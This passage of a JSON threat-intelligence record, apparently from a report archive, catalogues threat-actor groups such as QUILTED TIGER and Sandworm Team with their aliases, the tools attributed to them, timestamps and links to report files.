"UPPERCUT", "SNUGRIDE", "P8RAT", "RedLeaves", "SodaMaster", "pwdump", "Mimikatz", "PlugX", "PowerSploit", "ChChes", "cmd", "QuasarRAT", "AdFind", "Cobalt Strike", "PoisonIvy", "EvilGrab", "esentutl", "Impacket", "Ecipekac", "PsExec", "HUI Loader" ], "source_id": "MITRE", "reports": null }, { "id": "2b29dd16-a06f-4830-81a1-365443bc54b8", "created_at": "2023-01-06T13:46:38.460047Z", "updated_at": "2026-04-10T02:00:02.983931Z", "deleted_at": null, "main_name": "QUILTED TIGER", "aliases": [ "Chinastrats", "Sarit", "APT-C-09", "ZINC EMERSON", "ATK11", "G0040", "Orange Athos", "Thirsty Gemini", "Dropping Elephant" ], "source_name": "MISPGALAXY:QUILTED TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434713, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/89f7fb7b421848e7da6961809778cbdb65fd8a58.pdf", "text": "https://archive.orkl.eu/89f7fb7b421848e7da6961809778cbdb65fd8a58.txt", "img": "https://archive.orkl.eu/89f7fb7b421848e7da6961809778cbdb65fd8a58.jpg" } }